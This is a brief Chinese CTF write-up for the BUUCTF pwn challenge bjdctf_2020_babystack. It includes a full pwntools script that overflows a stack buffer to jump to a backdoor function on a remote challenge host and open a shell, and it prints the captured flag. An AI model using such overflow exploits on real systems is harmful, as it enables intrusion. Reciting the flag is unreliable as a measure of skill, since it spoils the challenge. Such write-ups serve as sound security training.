BUUCTF-bjdctf_2020_babystack writeup
checksec一下

开启了NX保护
拖进IDA

发现溢出点,read由用户控制输入的长度,而buf的实际长度只有6h,需要塞入10h的数据来溢出
在函数列表里发现后门函数

Payload如下
from pwn import * elf = ELF('./babystack') p = remote('node3.buuoj.cn',28348) Payload = b'a'*(0x10 + 8) + p64(elf.sym['backdoor']) p.sendline("100") p.sendline(Payload) p.interactive()
运行后得到sh

在根目录下发现flag
flag{950f3182-02f4-4b09-8f8a-91253f6b8b68}

浙公网安备 33010602011771号